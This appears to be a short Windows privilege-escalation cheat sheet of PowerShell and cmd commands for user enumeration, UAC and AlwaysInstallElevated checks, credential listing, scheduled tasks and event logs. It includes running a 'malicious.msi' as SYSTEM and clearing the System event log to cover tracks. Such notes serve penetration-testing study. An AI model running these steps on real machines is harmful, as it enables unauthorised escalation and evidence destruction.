1. User & Permission Enumeration
1) Check current user identity
whoami
2) Check user privileges
whoami /priv
3) List all local users on the system
Get-LocalUser
4) Check what groups your user belongs to
whoami /groups
2. Finding Privilege Escalation Opportunities
1) Check if PowerShell is running as an Administrator
[System.Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains "S-1-5-32-544"- If True, then you're an Administrator!
- Try relaunching PowerShell with administrator rights
Start-Process powershell -Verb runAs- If a UAC prompt appears, you don't have full admin privileges yet.
3. UAC Bypass & Privilege Escalation
- UAC: Windows User Account Control
1) Check if UAC is enabled
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
- output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1- 0x1 (Enabled): UAC is on, bypassing might be required
- 0x0 (Disabled): You already have admin rights.
2) Check for AlwaysInstallElevated Policy
- This setting allows any MSI installer to run with full system privileges
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- output:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1- If both return 0x1, you can escalate privileges by running an MSI installer as SYSTEM!
msiexec /quiet /qn /i malicious.msi
4. Extracting Credentials from Memory
1) Dump stored credentials from Windows Vault
cmdkey /list
5. Checking Scheduled Tasks & Persistence
1) List all scheduled tasks
schtasks /query /fo LIST /v
2) Delete a suspicious task
schtasks /delete /tn "Backdoor" /f
6. Windows Event Logs
1) View PowerShell execution logs
Get-EventLog -LogName Security -Newest 10
2) Clear event logs
wevtutil cl System